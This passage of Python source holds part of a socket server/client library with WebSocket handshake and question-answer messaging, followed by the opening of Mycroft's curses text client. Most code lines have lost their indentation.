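#         print("got", data, "from", client.conID)
#
#     def on_question(question):           # receives a Socket_Question
#         question.answer({"ok": True})
#
#     server = Socket_Server_Host("0.0.0.0", 5055, on_open, on_data, on_question)
#     # ... later: server.Shutdown()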
class Socket_Server_Client:
def __init__(self, sock, addr, conID, on_connection_open, on_data, on_question, on_close, Heart_Beat=True, Heart_Beat_Wait=20, legacy_buffer_size=1024):
"""CLIENT for Socket_Server_Host"""
self.socket = sock
self.addr = addr
self.conID = conID
self.on_data = on_data
self.on_close = on_close
self.running = True
self.meta = {}
self.recv_data = b""
self.data_usage = Transfer_Record()
self.client_type = None
self.on_question = on_question
self.legacy_buffer_size = legacy_buffer_size
self.__get_next__ = False
self.__ask_list__ = {}
self.created = essentials.TimeStamp()
self.heart_beat_wait = Heart_Beat_Wait
self.heart_beat = Heart_Beat
threading.Thread(target=self.__detect_client_type__, args=[on_connection_open]).start()
def __detect_client_type__(self, on_open):
self.socket.settimeout(2)
while True:
try:
self.recv_data += self.socket.recv(2)
except:
break
if b"PING" in self.recv_data[:7]:
try:
self.socket.send(b"PONG")
except:
pass
self.shutdown()
return
if b"permessage-deflate" in self.recv_data:
self.client_type = WEBONIC
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
msg = self.recv_data.decode("utf-8")
vals = msg.replace("\r", "").split("\n")
headers = {}
for item in vals:
if item != "" and ":" in item:
headers[item.split(":")[0]] = item.split(": ")[1]
self.WEBONIC_headers = headers
key = headers['Sec-WebSocket-Key']
sha1f = sha1()
sha1f.update(key.encode('utf-8') + GUID.encode('utf-8'))
response_key = base64.b64encode(sha1f.digest()).decode('utf-8')
websocket_answer = (
'HTTP/1.1 101 Switching Protocols',
'Upgrade: websocket',
'Connection: Upgrade',
'Sec-WebSocket-Accept: {key}\r\n\r\n',
)
response = '\r\n'.join(websocket_answer).format(key=response_key)
self.socket.send(response.encode('utf-8'))
self.socket.settimeout(0.5)
elif b"pythonic" in self.recv_data:
self.client_type = PYTHONIC
else:
self.socket.settimeout(0.075)
self.client_type = LEGACY
threading.Thread(target=on_open, args=[self]).start()
threading.Thread(target=self.__data_rev__, daemon=True).start()
if self.heart_beat == True and self.client_type == PYTHONIC:
self.socket.setblocking(1)
threading.Thread(target=self.__heart_beat__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.heart_beat_wait)
def shutdown(self):
"""
        Shut down this connection and remove it from wherever it is still stored. Runs the on_close event.
:rtype: None
"""
try:
self.on_close(self)
except:
pass
self.running = False
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
timeout = 0
while self.client_type == None and timeout < 4:
time.sleep(0.01)
timeout += 0.01
if self.client_type == None:
raise ValueError("Couldn't detect Client Type.")
if self.running == False:
raise ConnectionResetError("No Connection")
if self.client_type == PYTHONIC:
try:
SocketUpload(self.socket, data, self.data_usage.sent)
except:
self.shutdown()
elif self.client_type == WEBONIC:
try:
SocketUpload_WebBased(self.socket, data, self.data_usage.sent)
except Exception as e:
print(e)
self.shutdown()
elif self.client_type == LEGACY:
try:
self.socket.sendall(data)
except Exception as e:
print("EXCEPTION:", e)
self.shutdown()
def ask(self, data, timeout=5):
if self.client_type == WEBONIC:
            print("WARNING: ask() is not currently supported for web-based clients.")
return False
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
        copied = copy.deepcopy(self.__ask_list__[tok])
        del self.__ask_list__[tok]
        return copied['data']
def get_next(self):
self.__get_next__ = True
self.get_next_data = False
while self.__get_next__ == True:
time.sleep(0.05)
return self.get_next_data
def __data_rev__(self):
"""
        Server background task for receiving data and running the on_data event; you won't need to call this directly.
:rtype: None
"""
if self.client_type == PYTHONIC:
while self.running:
try:
data, temp = SocketDownload(self.socket, self.recv_data, self.data_usage.received)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and "pythonic" in data:
pass
elif type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
threading.Thread(target=self.on_question, args=[Socket_Question(data['data'], self, data['function_ask_question'])], daemon=True).start()
else:
if self.__get_next__ == True:
self.get_next_data = data
self.__get_next__ = False
else:
threading.Thread(target=self.on_data, args=[data, self], daemon=True).start()
time.sleep(0.05)
elif self.client_type == WEBONIC:
while self.running:
msg = b""
conti = True
while conti:
buffer = b""
while b"\n" not in buffer:
try:
buffer += self.socket.recv(1)
except:
conti = False
break
time.sleep(0.01)
msg += buffer
if msg != b"":
                    self.data_usage.received.add(len(msg))
                    socket_message = msg
                    try:
socket_message = WebSocket_Decode_Message(msg)
except:
pass
try:
socket_message = json.loads(socket_message)
except:
pass
if self.__get_next__ == True:
                        self.get_next_data = socket_message
self.__get_next__ = False
else:
threading.Thread(target=self.on_data, args=[socket_message, self], daemon=True).start()
time.sleep(0.01)
elif self.client_type == LEGACY:
while self.running:
msg = b""
conti = True
while b"\n" not in msg:
try:
msg += self.socket.recv(self.legacy_buffer_size)
except:
conti = False
break
time.sleep(0.01)
if msg != b"":
self.data_usage.received.add(len(msg))
if self.__get_next__ == True:
                        self.get_next_data = msg
self.__get_next__ = False
else:
threading.Thread(target=self.on_data, args=[msg, self], daemon=True).start()
time.sleep(0.01)
class Socket_Question(object):
def __init__(self, data, client, tok):
self.data = data
self.questioner = client
self.__answer_token__ = tok
def answer(self, data):
self.questioner.send({"function_ask_response": self.__answer_token__, "data": data})
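# Question/answer flow sketch (illustrative): ask() tags the outgoing payload
# with a token, blocks until a matching "function_ask_response" arrives, and
# the remote side replies through the Socket_Question wrapper it receives in
# its on_question callback. The name `connection` below stands for either a
# server-side Socket_Server_Client or a pythonic Socket_Connector.
#
#     # asking side:
#     reply = connection.ask({"cmd": "status"}, timeout=5)
#
#     # answering side, inside its on_question callback:
#     def on_question(question):
#         question.answer({"status": "ok"})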
class Configuration(object):
def __init__(self, default=PYTHONIC, on_data_recv=None, on_question=None, on_connection_close=None):
self.client_type = default
self.heart_beat = True
self.heart_beat_wait = 10
self.legacy_buffer_size = 1024
self.socket_timeout = 0.25
self.on_data_recv = on_data_recv
self.on_question = on_question
self.on_connection_close = on_connection_close
@property
def PYTHONIC(self):
return self.client_type == "python based"
@PYTHONIC.setter
def PYTHONIC(self, value):
if value == True:
self.client_type = "python based"
else:
raise ValueError("Setting value must be True")
@property
def WEBONIC(self):
return self.client_type == "web based"
@WEBONIC.setter
def WEBONIC(self, value):
if value == True:
self.client_type = "web based"
else:
raise ValueError("Setting value must be True")
@property
def LEGACY(self):
return self.client_type == "legacy"
@LEGACY.setter
def LEGACY(self, value):
if value == True:
self.client_type = "legacy"
else:
raise ValueError("Setting value must be True")
class Socket_Connector:
    def __init__(self, HOST, PORT, Config=Configuration(PYTHONIC)):
        """Connect to a socket server (for example one run by Socket_Server_Host).
Parameters
----------
HOST (:obj:`str`): The hosting IP Address for the server.
PORT (:obj:`int`): The port the server is using.
Attributes
----------
        running (:obj:`bool`): Is the connection still open.
        on_connection_close (:obj:`def`): Holds the function you specified to use; can be overwritten.
        on_data_recv (:obj:`def`): Holds the function you specified to use; can be overwritten.
"""
self.running = True
self.HOST = HOST
self.PORT = PORT
self.recv_data = b""
self.data_usage = Transfer_Record()
self.__ask_list__ = {}
self.__get_next__ = False
self.configuration = Config
def get_next(self, timeout=30):
self.__get_next__ = True
self.get_next_data = False
start = 0
while self.__get_next__ == True and self.running == True and start < timeout:
time.sleep(0.05)
start += 0.05
if self.running == False:
raise ConnectionResetError("The connection was closed.")
if start >= timeout:
raise TimeoutError("No response in time.")
return self.get_next_data
def connect(self):
if self.configuration.WEBONIC:
            raise NotImplementedError("WebSocket clients haven't been implemented yet.")
self.socket = ConnectorSocket(self.HOST, self.PORT)
if self.configuration.PYTHONIC == True:
self.send({"pythonic": True})
time.sleep(2)
if self.configuration.heart_beat == True:
threading.Thread(target=self.__heart_beat__, daemon=True).start()
elif self.configuration.WEBONIC == True:
self.socket.settimeout(self.configuration.socket_timeout)
elif self.configuration.LEGACY == True:
self.socket.settimeout(self.configuration.socket_timeout)
else:
raise ValueError("No configuration values set.")
threading.Thread(target=self.__data_rev__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.configuration.heart_beat_wait)
def ask(self, data, timeout=5):
if self.configuration.PYTHONIC != True:
print("ERROR: Can't ask questions to non-Pythonic connections")
return
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
        copied = copy.deepcopy(self.__ask_list__[tok])
        del self.__ask_list__[tok]
        return copied['data']
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
if self.running == False:
raise ConnectionResetError("No Connection")
try:
if self.configuration.LEGACY:
self.socket.sendall(data)
elif self.configuration.PYTHONIC:
SocketUpload(self.socket, data, self.data_usage.sent)
elif self.configuration.WEBONIC:
self.socket.send(data)
except Exception as e:
print(e)
self.shutdown()
def shutdown(self):
"""
Shuts down this connection. Completes the on_close event.
:rtype: None
"""
self.running = False
try:
self.configuration.on_connection_close()
except:
print("WARN: No On Close Function")
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def __data_rev__(self):
"""
        Client background task for receiving data and running the on_data event; you won't need to call this directly.
:rtype: None
"""
if self.configuration.LEGACY:
while self.running:
msg = b""
while b"\n" not in msg:
try:
msg += self.socket.recv(self.configuration.legacy_buffer_size)
except Exception as e:
break
time.sleep(0.01)
if msg != b"":
self.data_usage.received.add(len(msg))
if self.__get_next__ == True:
self.get_next_data = msg
self.__get_next__ = False
else:
threading.Thread(target=self.configuration.on_data_recv, args=[msg], daemon=True).start()
time.sleep(0.01)
elif self.configuration.PYTHONIC:
while self.running:
try:
data, temp = SocketDownload(self.socket, self.recv_data, self.data_usage.received)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
self.configuration.on_question(Socket_Question(data['data'], self, data['function_ask_question']))
else:
if self.__get_next__ == True:
self.get_next_data = data
self.__get_next__ = False
else:
threading.Thread(target=self.configuration.on_data_recv, args=[data], daemon=True).start()
elif self.configuration.WEBONIC:
while self.running:
msg = b""
conti = True
while conti:
buffer = b""
while b"\n" not in buffer:
try:
buffer += self.socket.recv(1)
except:
conti = False
break
time.sleep(0.001)
msg += buffer
if msg != b"":
self.data_usage.received.add(len(msg))
socket_message = msg
try:
socket_message = WebSocket_Decode_Message(socket_message)
except:
pass
try:
socket_message = json.loads(socket_message)
except:
pass
try:
socket_message = socket_message.decode()
except:
pass
if self.__get_next__ == True:
                        self.get_next_data = socket_message
self.__get_next__ = False
else:
threading.Thread(target=self.configuration.on_data_recv, args=[socket_message], daemon=True).start()
time.sleep(0.01)
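# A minimal client sketch (illustrative; the host, port, and callback are
# assumptions). The default Configuration(PYTHONIC) performs the "pythonic"
# handshake and starts the heartbeat thread during connect().
#
#     def handle_data(data):
#         print("received:", data)
#
#     conf = Configuration(PYTHONIC, on_data_recv=handle_data)
#     client = Socket_Connector("127.0.0.1", 5055, Config=conf)
#     client.connect()
#     client.send({"hello": "server"})
#     print(client.ask({"cmd": "status"}))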
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
import xdg.BaseDirectory
from mycroft.client.text.gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars; set it to the system
# default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
REDRAW_FREQUENCY = 10 # seconds between full redraws
last_redraw = time.time() - (REDRAW_FREQUENCY - 1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
    If the default locale supports UTF-8, re-encode the string; otherwise
    remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
filename = "mycroft_cli.conf"
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
config_file = None
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if os.path.isfile(path):
LOG.warning(" ===============================================")
LOG.warning(" == DEPRECATION WARNING ==")
LOG.warning(" ===============================================")
LOG.warning(" You still have a config file at " +
path)
LOG.warning(" Note that this location is deprecated and will" +
" not be used in the future")
LOG.warning(" Please move it to " +
os.path.join(xdg.BaseDirectory.save_config_path('mycroft'),
filename))
config_file = path
# Check XDG_CONFIG_DIR
if config_file is None:
for conf_dir in xdg.BaseDirectory.load_config_paths('mycroft'):
xdg_file = os.path.join(conf_dir, filename)
if os.path.isfile(xdg_file):
config_file = xdg_file
break
# Check /etc/mycroft
if config_file is None:
config_file = os.path.join("/etc/mycroft", filename)
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
config_file = os.path.join(
xdg.BaseDirectory.save_config_path("mycroft"), filename)
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
        thread.daemon = True  # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
        thread.daemon = True  # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Args:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS - x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad - x - len(msg))
else:
# pad to given length (or screen width)
if x + pad > curses.COLS:
pad = curses.COLS - x
s += ch * (pad - len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
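# Example call (illustrative only): render a padded status line in the heading
# color at row 5, clipped/padded to the right edge of the screen.
#
#     draw(0, 5, "Mic: ready", pad=True, clr=CLR_HEADING)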
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
        # Colors (on black background):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(
x,
y,
" " +
make_titlebar(
"= GUI",
gui_width -
1) +
" ",
clr=CLR_HEADING)
cnt = len(gui_text) + 1
if cnt > curses.LINES - 15:
cnt = curses.LINES - 15
for i in range(0, cnt):
draw(x, y + 1 + i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x + 2, y + 1 + i, gui_text[i], pad=gui_width - 3)
else:
draw(x + 2, y + 1 + i, "*" * (gui_width - 3))
draw(x + (gui_width - 1), y + 1 + i, "!", clr=CLR_HEADING)
draw(x, y + cnt, " " + "-" * (gui_width - 2) + " ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_redraw
global auto_scroll
global size_log_area
if time.time() - last_redraw > REDRAW_FREQUENCY:
        # Do a full-screen redraw periodically to clear any
        # noise from non-curses text that gets output to the
        # screen (e.g. modules that do a 'print')
scr.clear()
last_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS - 1 - len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS - 1 - len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG2)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG1)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
